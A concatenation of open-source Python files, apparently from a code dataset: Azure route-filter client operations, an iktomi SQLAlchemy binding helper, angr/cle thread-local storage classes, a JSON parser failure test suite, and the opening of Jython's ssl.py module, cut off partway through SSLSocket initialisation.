self, resource_group_name, route_filter_name, route_filter_parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(route_filter_parameters, 'PatchRouteFilter')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RouteFilter', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, route_filter_name, route_filter_parameters, custom_headers=None, raw=False, **operation_config):
"""Updates a route filter in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param route_filter_parameters: Parameters supplied to the update
route filter operation.
:type route_filter_parameters:
~azure.mgmt.network.v2017_08_01.models.PatchRouteFilter
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns RouteFilter
or ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.RouteFilter]
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
route_filter_parameters=route_filter_parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = self._deserialize('RouteFilter', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all route filters in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of RouteFilter
:rtype:
~azure.mgmt.network.v2017_08_01.models.RouteFilterPaged[~azure.mgmt.network.v2017_08_01.models.RouteFilter]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RouteFilterPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RouteFilterPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all route filters in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of RouteFilter
:rtype:
~azure.mgmt.network.v2017_08_01.models.RouteFilterPaged[~azure.mgmt.network.v2017_08_01.models.RouteFilter]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Network/routeFilters'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.RouteFilterPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.RouteFilterPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
| mit |
SlivTime/iktomi | iktomi/db/sqla/__init__.py | 3 | 1389 | # -*- coding: utf-8 -*-
import six
import logging
from importlib import import_module
from sqlalchemy import create_engine
def multidb_binds(databases, package=None, engine_params=None):
'''Creates dictionary to be passed as `binds` parameter to
`sqlalchemy.orm.sessionmaker()` from dictionary mapping models module name
to connection URI that should be used for these models. Models module must
have `metadata` attribute. `package` when set must be a package or package
name for all models modules.'''
engine_params = engine_params or {}
if not (package is None or isinstance(package, six.string_types)):
package = getattr(package, '__package__', None) or package.__name__
binds = {}
for ref, uri in databases.items():
md_ref = '.'.join(filter(None, [package, ref]))
md_module = import_module(md_ref)
try:
metadata = md_module.metadata
except AttributeError:
raise ImportError(
'Cannot import name metadata from module {}'.format(md_ref))
engine = create_engine(uri, **engine_params)
# Dot before [name] is required to allow setting logging level etc. for
# all them at once.
engine.logger = logging.getLogger('sqlalchemy.engine.[%s]' % ref)
for table in metadata.sorted_tables:
binds[table] = engine
return binds
| mit |
angr/cle | cle/backends/tls/__init__.py | 1 | 1904 | from ..relocation import Relocation
from ...errors import CLEError
from .. import Backend
class ThreadManager:
"""
This class tracks what data is thread-local and can generate thread initialization images
Most of the heavy lifting will be handled in a subclass
"""
def __init__(self, loader, arch, max_modules=256):
self.loader = loader
self.arch = arch
self.max_modules = max_modules
self.modules = []
self.threads = []
def register_object(self, obj):
if not obj.tls_used:
return False
if len(self.modules) >= self.max_modules:
raise CLEError("Too many loaded modules for TLS to handle... file this as a bug")
obj.tls_module_id = len(self.modules)
self.modules.append(obj)
return True
@staticmethod
def initialization_image(obj):
return obj.memory.load(obj.tls_data_start, obj.tls_data_size).ljust(obj.tls_block_size, b'\0')
def new_thread(self, insert=True):
thread = self._thread_cls(self)
if insert:
self.loader._internal_load(thread)
self.threads.append(thread)
return thread
@property
def _thread_cls(self):
raise NotImplementedError("This platform doesn't have an implementation of thread-local storage")
class InternalTLSRelocation(Relocation):
AUTO_HANDLE_NONE = True
def __init__(self, val, offset, owner):
super().__init__(owner, None, offset)
self.val = val
@property
def value(self):
return self.val + self.owner.mapped_base
class TLSObject(Backend):
def __init__(self, loader, arch):
super().__init__('cle##tls', None, loader=loader, arch=arch)
from .elf_tls import ELFThreadManager
from .elfcore_tls import ELFCoreThreadManager
from .pe_tls import PEThreadManager
from .minidump_tls import MinidumpThreadManager
| bsd-2-clause |
2015fallproject/2015fallcase2 | static/Brython3.2.0-20150701-214155/Lib/test/unittests/test_json/test_fail.py | 29 | 3910 | from test.test_json import PyTest, CTest
# 2007-10-05
JSONDOCS = [
# http://json.org/JSON_checker/test/fail1.json
'"A JSON payload should be an object or array, not a string."',
# http://json.org/JSON_checker/test/fail2.json
'["Unclosed array"',
# http://json.org/JSON_checker/test/fail3.json
'{unquoted_key: "keys must be quoted"}',
# http://json.org/JSON_checker/test/fail4.json
'["extra comma",]',
# http://json.org/JSON_checker/test/fail5.json
'["double extra comma",,]',
# http://json.org/JSON_checker/test/fail6.json
'[ , "<-- missing value"]',
# http://json.org/JSON_checker/test/fail7.json
'["Comma after the close"],',
# http://json.org/JSON_checker/test/fail8.json
'["Extra close"]]',
# http://json.org/JSON_checker/test/fail9.json
'{"Extra comma": true,}',
# http://json.org/JSON_checker/test/fail10.json
'{"Extra value after close": true} "misplaced quoted value"',
# http://json.org/JSON_checker/test/fail11.json
'{"Illegal expression": 1 + 2}',
# http://json.org/JSON_checker/test/fail12.json
'{"Illegal invocation": alert()}',
# http://json.org/JSON_checker/test/fail13.json
'{"Numbers cannot have leading zeroes": 013}',
# http://json.org/JSON_checker/test/fail14.json
'{"Numbers cannot be hex": 0x14}',
# http://json.org/JSON_checker/test/fail15.json
'["Illegal backslash escape: \\x15"]',
# http://json.org/JSON_checker/test/fail16.json
'[\\naked]',
# http://json.org/JSON_checker/test/fail17.json
'["Illegal backslash escape: \\017"]',
# http://json.org/JSON_checker/test/fail18.json
'[[[[[[[[[[[[[[[[[[[["Too deep"]]]]]]]]]]]]]]]]]]]]',
# http://json.org/JSON_checker/test/fail19.json
'{"Missing colon" null}',
# http://json.org/JSON_checker/test/fail20.json
'{"Double colon":: null}',
# http://json.org/JSON_checker/test/fail21.json
'{"Comma instead of colon", null}',
# http://json.org/JSON_checker/test/fail22.json
'["Colon instead of comma": false]',
# http://json.org/JSON_checker/test/fail23.json
'["Bad value", truth]',
# http://json.org/JSON_checker/test/fail24.json
"['single quote']",
# http://json.org/JSON_checker/test/fail25.json
'["\ttab\tcharacter\tin\tstring\t"]',
# http://json.org/JSON_checker/test/fail26.json
'["tab\\ character\\ in\\ string\\ "]',
# http://json.org/JSON_checker/test/fail27.json
'["line\nbreak"]',
# http://json.org/JSON_checker/test/fail28.json
'["line\\\nbreak"]',
# http://json.org/JSON_checker/test/fail29.json
'[0e]',
# http://json.org/JSON_checker/test/fail30.json
'[0e+]',
# http://json.org/JSON_checker/test/fail31.json
'[0e+-1]',
# http://json.org/JSON_checker/test/fail32.json
'{"Comma instead if closing brace": true,',
# http://json.org/JSON_checker/test/fail33.json
'["mismatch"}',
# http://code.google.com/p/simplejson/issues/detail?id=3
'["A\u001FZ control characters in string"]',
]
SKIPS = {
1: "why not have a string payload?",
18: "spec doesn't specify any nesting limitations",
}
class TestFail:
def test_failures(self):
for idx, doc in enumerate(JSONDOCS):
idx = idx + 1
if idx in SKIPS:
self.loads(doc)
continue
try:
self.loads(doc)
except ValueError:
pass
else:
self.fail("Expected failure for fail{0}.json: {1!r}".format(idx, doc))
def test_non_string_keys_dict(self):
data = {'a' : 1, (1, 2) : 2}
#This is for c encoder
self.assertRaises(TypeError, self.dumps, data)
#This is for python encoder
self.assertRaises(TypeError, self.dumps, data, indent=True)
class TestPyFail(TestFail, PyTest): pass
class TestCFail(TestFail, CTest): pass
| agpl-3.0 |
thomashaw/SecGen | modules/utilities/unix/audit_tools/ghidra/files/release/Ghidra/Features/Python/data/jython-2.7.1/Lib/ssl.py | 6 | 49205 | import base64
from collections import namedtuple
import errno
from java.security.cert import CertificateFactory
import uuid
from java.io import BufferedInputStream
from java.security import KeyStore, KeyStoreException
from java.security.cert import CertificateParsingException
from javax.naming.ldap import LdapName
from java.lang import IllegalArgumentException, System
import logging
import os
import textwrap
import time
import re
import threading
try:
# jarjar-ed version
from org.python.netty.channel import ChannelInitializer
from org.python.netty.handler.ssl import SslHandler, SslProvider, SslContextBuilder, ClientAuth
from org.python.netty.handler.ssl.util import SimpleTrustManagerFactory, InsecureTrustManagerFactory
from org.python.netty.buffer import ByteBufAllocator
except ImportError:
# dev version from extlibs
from io.netty.channel import ChannelInitializer
from io.netty.handler.ssl import SslHandler, SslProvider, SslContextBuilder, ClientAuth
from io.netty.handler.ssl.util import SimpleTrustManagerFactory, InsecureTrustManagerFactory
from io.netty.buffer import ByteBufAllocator
from _socket import (
SSLError, raises_java_exception,
SSL_ERROR_SSL,
SSL_ERROR_WANT_READ,
SSL_ERROR_WANT_WRITE,
SSL_ERROR_WANT_X509_LOOKUP,
SSL_ERROR_SYSCALL,
SSL_ERROR_ZERO_RETURN,
SSL_ERROR_WANT_CONNECT,
SSL_ERROR_EOF,
SSL_ERROR_INVALID_ERROR_CODE,
SOL_SOCKET,
SO_TYPE,
SOCK_STREAM,
socket,
_socketobject,
ChildSocket,
error as socket_error)
from _sslcerts import _get_openssl_key_manager, _extract_cert_from_data, _extract_certs_for_paths, \
_str_hash_key_entry, _get_ecdh_parameter_spec, CompositeX509TrustManagerFactory
from _sslcerts import SSLContext as _JavaSSLContext
from java.text import SimpleDateFormat
from java.util import ArrayList, Locale, TimeZone, NoSuchElementException
from java.util.concurrent import CountDownLatch
from javax.naming.ldap import LdapName
from javax.net.ssl import SSLException, SSLHandshakeException
from javax.security.auth.x500 import X500Principal
from org.ietf.jgss import Oid
try:
# requires Java 8 or higher for this support
from javax.net.ssl import SNIHostName, SNIMatcher
HAS_SNI = True
except ImportError:
HAS_SNI = False
log = logging.getLogger("_socket")
# Pretend to be OpenSSL
OPENSSL_VERSION = "OpenSSL 1.0.0 (as emulated by Java SSL)"
OPENSSL_VERSION_NUMBER = 0x1000000L
OPENSSL_VERSION_INFO = (1, 0, 0, 0, 0)
_OPENSSL_API_VERSION = OPENSSL_VERSION_INFO
CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED = range(3)
_CERT_TO_CLIENT_AUTH = {CERT_NONE: ClientAuth.NONE,
CERT_OPTIONAL: ClientAuth.OPTIONAL,
CERT_REQUIRED: ClientAuth.REQUIRE}
# Do not support PROTOCOL_SSLv2, it is highly insecure and it is optional
_, PROTOCOL_SSLv3, PROTOCOL_SSLv23, PROTOCOL_TLSv1, PROTOCOL_TLSv1_1, PROTOCOL_TLSv1_2 = range(6)
_PROTOCOL_NAMES = {
PROTOCOL_SSLv3: 'SSLv3',
PROTOCOL_SSLv23: 'SSLv23',
PROTOCOL_TLSv1: 'TLSv1',
PROTOCOL_TLSv1_1: 'TLSv1.1',
PROTOCOL_TLSv1_2: 'TLSv1.2'
}
OP_ALL, OP_NO_SSLv2, OP_NO_SSLv3, OP_NO_TLSv1 = range(4)
OP_SINGLE_DH_USE, OP_NO_COMPRESSION, OP_CIPHER_SERVER_PREFERENCE, OP_SINGLE_ECDH_USE = 1048576, 131072, 4194304, 524288
VERIFY_DEFAULT, VERIFY_CRL_CHECK_LEAF, VERIFY_CRL_CHECK_CHAIN, VERIFY_X509_STRICT = 0, 4, 12, 32
CHANNEL_BINDING_TYPES = []
# https://docs.python.org/2/library/ssl.html#ssl.HAS_ALPN etc...
HAS_ALPN, HAS_NPN, HAS_ECDH = False, False, True
# TODO not supported on jython yet
# Disable weak or insecure ciphers by default
# (OpenSSL's default setting is 'DEFAULT:!aNULL:!eNULL')
# Enable a better set of ciphers by default
# This list has been explicitly chosen to:
# * Prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE)
# * Prefer ECDHE over DHE for better performance
# * Prefer any AES-GCM over any AES-CBC for better performance and security
# * Then Use HIGH cipher suites as a fallback
# * Then Use 3DES as fallback which is secure but slow
# * Disable NULL authentication, NULL encryption, and MD5 MACs for security
# reasons
_DEFAULT_CIPHERS = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5'
)
# TODO not supported on jython yet
# Restricted and more secure ciphers for the server side
# This list has been explicitly chosen to:
# * Prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE)
# * Prefer ECDHE over DHE for better performance
# * Prefer any AES-GCM over any AES-CBC for better performance and security
# * Then Use HIGH cipher suites as a fallback
# * Then Use 3DES as fallback which is secure but slow
# * Disable NULL authentication, NULL encryption, MD5 MACs, DSS, and RC4 for
# security reasons
_RESTRICTED_SERVER_CIPHERS = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5:!DSS:!RC4'
)
_rfc2822_date_format = SimpleDateFormat("MMM dd HH:mm:ss yyyy z", Locale.US)
_rfc2822_date_format.setTimeZone(TimeZone.getTimeZone("GMT"))
_ldap_rdn_display_names = {
# list from RFC 2253
"CN": "commonName",
"E": "emailAddress",
"L": "localityName",
"ST": "stateOrProvinceName",
"O": "organizationName",
"OU": "organizationalUnitName",
"C": "countryName",
"STREET": "streetAddress",
"DC": "domainComponent",
"UID": "userid"
}
_cert_name_types = [
# Fields documented in
# http://docs.oracle.com/javase/7/docs/api/java/security/cert/X509Certificate.html#getSubjectAlternativeNames()
"other",
"rfc822",
"DNS",
"x400Address",
"directory",
"ediParty",
"uniformResourceIdentifier",
"ipAddress",
"registeredID"]
def _str_or_unicode(s):
try:
return s.encode('ascii')
except UnicodeEncodeError:
return s
except AttributeError:
return str(s)
class CertificateError(ValueError):
pass
# TODO for now create these exceptions here to conform with API
class SSLZeroReturnError(SSLError):
pass
class SSLWantReadError(SSLError):
pass
class SSLWantWriteError(SSLError):
pass
class SSLSyscallError(SSLError):
pass
class SSLEOFError(SSLError):
pass
def _dnsname_match(dn, hostname, max_wildcards=1):
"""Matching according to RFC 6125, section 6.4.3
http://tools.ietf.org/html/rfc6125#section-6.4.3
"""
pats = []
if not dn:
return False
pieces = dn.split(r'.')
leftmost = pieces[0]
remainder = pieces[1:]
wildcards = leftmost.count('*')
if wildcards > max_wildcards:
# Issue #17980: avoid denials of service by refusing more
# than one wildcard per fragment. A survery of established
# policy among SSL implementations showed it to be a
# reasonable choice.
raise CertificateError(
"too many wildcards in certificate DNS name: " + repr(dn))
# speed up common case w/o wildcards
if not wildcards:
return dn.lower() == hostname.lower()
# RFC 6125, section 6.4.3, subitem 1.
# The client SHOULD NOT attempt to match a presented identifier in which
# the wildcard character comprises a label other than the left-most label.
if leftmost == '*':
# When '*' is a fragment by itself, it matches a non-empty dotless
# fragment.
pats.append('[^.]+')
elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
# RFC 6125, section 6.4.3, subitem 3.
# The client SHOULD NOT attempt to match a presented identifier
# where the wildcard character is embedded within an A-label or
# U-label of an internationalized domain name.
pats.append(re.escape(leftmost))
else:
# Otherwise, '*' matches any dotless string, e.g. www*
pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
# add the remaining fragments, ignore any wildcards
for frag in remainder:
pats.append(re.escape(frag))
pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
return pat.match(hostname)
def match_hostname(cert, hostname):
"""Verify that *cert* (in decoded format as returned by
SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125
rules are followed, but IP addresses are not accepted for *hostname*.
CertificateError is raised on failure. On success, the function
returns nothing.
"""
if not cert:
raise ValueError("empty or no certificate, match_hostname needs a "
"SSL socket or SSL context with either "
"CERT_OPTIONAL or CERT_REQUIRED")
dnsnames = []
san = cert.get('subjectAltName', ())
for key, value in san:
if key == 'DNS':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if not dnsnames:
# The subject is only checked when there is no dNSName entry
# in subjectAltName
for sub in cert.get('subject', ()):
for key, value in sub:
# XXX according to RFC 2818, the most specific Common Name
# must be used.
if key == 'commonName':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if len(dnsnames) > 1:
raise CertificateError("hostname %r "
"doesn't match either of %s"
% (hostname, ', '.join(map(repr, dnsnames))))
elif len(dnsnames) == 1:
raise CertificateError("hostname %r "
"doesn't match %r"
% (hostname, dnsnames[0]))
else:
raise CertificateError("no appropriate commonName or "
"subjectAltName fields were found")
DefaultVerifyPaths = namedtuple("DefaultVerifyPaths",
"cafile capath openssl_cafile_env openssl_cafile openssl_capath_env "
"openssl_capath")
def get_default_verify_paths():
"""Return paths to default cafile and capath.
"""
cafile, capath = None, None
default_cert_dir_env = os.environ.get('SSL_CERT_DIR', None)
default_cert_file_env = os.environ.get('SSL_CERT_FILE', None)
java_cert_file = System.getProperty('javax.net.ssl.trustStore')
if java_cert_file is not None and os.path.isfile(java_cert_file):
cafile = java_cert_file
else:
if default_cert_dir_env is not None:
capath = default_cert_dir_env if os.path.isdir(default_cert_dir_env) else None
if default_cert_file_env is not None:
cafile = default_cert_file_env if os.path.isfile(default_cert_file_env) else None
if cafile is None:
# http://docs.oracle.com/javase/6/docs/technotes/guides/security/jsse/JSSERefGuide.html
java_home = System.getProperty('java.home')
for _path in ('lib/security/jssecacerts', 'lib/security/cacerts'):
java_cert_file = os.path.join(java_home, _path)
if os.path.isfile(java_cert_file):
cafile = java_cert_file
capath = os.path.dirname(cafile)
return DefaultVerifyPaths(cafile if os.path.isfile(cafile) else None,
capath if capath and os.path.isdir(capath) else None,
'SSL_CERT_FILE', default_cert_file_env,
'SSL_CERT_DIR', default_cert_dir_env)
class _ASN1Object(namedtuple("_ASN1Object", "nid shortname longname oid")):
"""ASN.1 object identifier lookup
"""
__slots__ = ()
def __new__(cls, oid):
# TODO, just fake it for now
if oid == '1.3.6.1.5.5.7.3.1':
return super(_ASN1Object, cls).__new__(cls, 129, 'serverAuth', 'TLS Web Server Authentication', oid)
elif oid == '1.3.6.1.5.5.7.3.2':
return super(_ASN1Object, cls).__new__(cls, 130, 'clientAuth', 'clientAuth', oid)
raise ValueError()
class Purpose(_ASN1Object):
"""SSLContext purpose flags with X509v3 Extended Key Usage objects
"""
Purpose.SERVER_AUTH = Purpose('1.3.6.1.5.5.7.3.1')
Purpose.CLIENT_AUTH = Purpose('1.3.6.1.5.5.7.3.2')
def create_default_context(purpose=Purpose.SERVER_AUTH, cafile=None,
capath=None, cadata=None):
"""Create a SSLContext object with default settings.
NOTE: The protocol and settings may change anytime without prior
deprecation. The values represent a fair balance between maximum
compatibility and security.
"""
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
context = SSLContext(PROTOCOL_SSLv23)
# SSLv2 considered harmful.
context.options |= OP_NO_SSLv2
# SSLv3 has problematic security and is only required for really old
# clients such as IE6 on Windows XP
context.options |= OP_NO_SSLv3
# disable compression to prevent CRIME attacks (OpenSSL 1.0+)
# TODO not supported on Jython
# context.options |= getattr(_ssl, "OP_NO_COMPRESSION", 0)
if purpose == Purpose.SERVER_AUTH:
# verify certs and host name in client mode
context.verify_mode = CERT_REQUIRED
context.check_hostname = True
elif purpose == Purpose.CLIENT_AUTH:
pass
# TODO commeted out by darjus, none of the below is supported :(
# # Prefer the server's ciphers by default so that we get stronger
# # encryption
# context.options |= getattr(_ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
#
# # Use single use keys in order to improve forward secrecy
# context.options |= getattr(_ssl, "OP_SINGLE_DH_USE", 0)
# context.options |= getattr(_ssl, "OP_SINGLE_ECDH_USE", 0)
#
# # disallow ciphers with known vulnerabilities
# context.set_ciphers(_RESTRICTED_SERVER_CIPHERS)
if cafile or capath or cadata:
context.load_verify_locations(cafile, capath, cadata)
elif context.verify_mode != CERT_NONE:
# no explicit cafile, capath or cadata but the verify mode is
# CERT_OPTIONAL or CERT_REQUIRED. Let's try to load default system
# root CA certificates for the given purpose. This may fail silently.
context.load_default_certs(purpose)
return context
def _create_unverified_context(protocol=PROTOCOL_SSLv23, cert_reqs=None,
check_hostname=False, purpose=Purpose.SERVER_AUTH,
certfile=None, keyfile=None,
cafile=None, capath=None, cadata=None):
"""Create a SSLContext object for Python stdlib modules
All Python stdlib modules shall use this function to create SSLContext
objects in order to keep common settings in one place. The configuration
is less restricted than create_default_context()'s to increase backward
compatibility.
"""
if not isinstance(purpose, _ASN1Object):
raise TypeError(purpose)
context = SSLContext(protocol)
# SSLv2 considered harmful.
context.options |= OP_NO_SSLv2
# SSLv3 has problematic security and is only required for really old
# clients such as IE6 on Windows XP
context.options |= OP_NO_SSLv3
if cert_reqs is not None:
context.verify_mode = cert_reqs
context.check_hostname = check_hostname
if keyfile and not certfile:
raise ValueError("certfile must be specified")
if certfile or keyfile:
context.load_cert_chain(certfile, keyfile)
# load CA root certs
if cafile or capath or cadata:
context.load_verify_locations(cafile, capath, cadata)
elif context.verify_mode != CERT_NONE:
# no explicit cafile, capath or cadata but the verify mode is
# CERT_OPTIONAL or CERT_REQUIRED. Let's try to load default system
# root CA certificates for the given purpose. This may fail silently.
context.load_default_certs(purpose)
return context
# Used by http.client if no context is explicitly passed.
_create_default_https_context = create_default_context
# Backwards compatibility alias, even though it's not a public name.
_create_stdlib_context = _create_unverified_context
class SSLInitializer(ChannelInitializer):
def __init__(self, ssl_handler):
self.ssl_handler = ssl_handler
def initChannel(self, ch):
pipeline = ch.pipeline()
pipeline.addFirst("ssl", self.ssl_handler)
class SSLSocket(object):
def __init__(self, sock, keyfile=None, certfile=None, server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True, suppress_ragged_eofs=True, npn_protocols=None, ciphers=None,
server_hostname=None, _context=None):
# TODO ^^ handle suppress_ragged_eofs
self.sock = sock
self.do_handshake_on_connect = do_handshake_on_connect
self._sock = sock._sock # the real underlying socket
# FIXME in CPython, a check like so is performed - but this is
# not quite correct, based on tests. We should revisit to see
# if we can make this work as desired.
# if do_handshake_on_connect and self._sock.timeout == 0:
# raise ValueError("do_handshake_on_connect should not be specified for non-blocking sockets")
self._connected = False
if _context:
self._context = _context
else:
if server_side and not certfile:
raise ValueError("certfile must be specified for server-side "
"operations")
if keyfile and not certfile:
raise ValueError("certfile must be specified")
if certfile and not keyfile:
keyfile = certfile
self._context = SSLContext(ssl_version)
self._context.verify_mode = cert_reqs
if ca_certs:
self._context.load_verify_locations(ca_certs)
if certfile:
self._context.load_cert_chain(certfile, keyfile)
if npn_protocols:
self._context.set_npn_protocols(npn_protocols)
if ciphers:
self._context.set_ciphers(ciphers)
self.keyfile = keyfile
self.certfile = certfile
self.cert_reqs = cert_reqs
self.ssl_version = ssl_version
self.ca_certs = ca_certs
self.ciphers = ciphers
if sock.getsockopt(SOL_SOCKET, SO_TYPE) != SOCK_STREAM:
raise NotImplementedError("only stream sockets are supported")
if server_side and server_hostname:
raise ValueError("server_hostname can only be specified "
"in client mode")
if self._context.check_hostname and not server_hostname:
raise ValueError("check_hostname requires server_hostname")
self.server_side = server_side
self.server_hostname = server_hostname
self.suppress_ragged_eofs = suppress_ragged_eofs
self.ssl_handler = None
# We use _sslobj here to support the CPython convention that
# an object means we have handshaked. It is used by existing code
# in the wild that looks at this ostensibly internal attribute.
# FIXME CPython uses _sslobj to track the OpenSSL wrapper
# object that's implemented in C, with the following
# properties:
#
# 'cipher', 'compression', 'context', 'do_handshake',
# 'peer_certificate', 'pending', 'read', 'shutdown',
# 'tls_unique_cb', 'version', 'write'
self._sslobj = self # setting to self is not quite right
self.engine = None
if self.do_handshake_on_connect and self._sock.connected:
log.debug("Handshaking socket on connect", extra={"sock": self._sock})
if isinstance(self._sock, ChildSocket):
# Need to handle child sockets differently depending
# on whether the parent socket is wrapped or not.
#
# In either case, we cannot handshake here in this
# thread - it must be done in the child pool and
# before the child is activated.
#
# 1. If wrapped, this is going through SSLSocket.accept
if isinstance(self._sock.parent_socket, SSLSocket):
# already wrapped, via `wrap_child` function a few lines below
log.debug(
"Child socket - will handshake in child loop type=%s parent=%s",
type(self._sock), self._sock.parent_socket,
extra={"sock": self._sock})
self._sock._make_active()
# 2. If not, using code will be calling SSLContext.wrap_socket
# *after* accept from an unwrapped socket
else:
log.debug("Child socket will wrap self with handshake", extra={"sock": self._sock})
setup_handshake_latch = CountDownLatch(1)
def setup_handshake():
handshake_future = self.do_handshake()
setup_handshake_latch.countDown()
return handshake_future
self._sock.ssl_wrap_self = setup_handshake
self._sock._make_active()
setup_handshake_latch.await()
